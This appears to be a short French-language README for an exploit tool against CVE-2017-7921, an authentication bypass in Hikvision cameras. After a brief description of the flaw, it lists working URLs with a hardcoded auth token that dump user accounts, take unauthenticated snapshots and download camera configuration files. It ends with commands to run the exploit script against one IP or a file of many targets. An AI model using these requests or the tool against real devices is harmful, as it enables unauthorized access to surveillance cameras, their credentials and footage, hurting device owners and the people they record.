
Hikvision camera CVE-2017-7921-EXP
Un problème d'authentification incorrecte a été découvert dans les appareils Hikvision.
La vulnérabilité d'authentification incorrecte se produit lorsqu'une application n'authentifie pas les utilisateurs de manière adéquate ou correcte.
Cela peut permettre à un utilisateur malveillant d'élever ses privilèges sur le système et d'obtenir un accès à des informations sensibles.
https://seclists.org/fulldisclosure/2017/Sep/23
Détails de la vulnérabilité :
----------------------
Récupérer une liste de tous les utilisateurs et leurs rôles :
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtenir un instantané de la caméra sans authentification :
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
Et pire encore, on peut télécharger la configuration de la caméra :
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
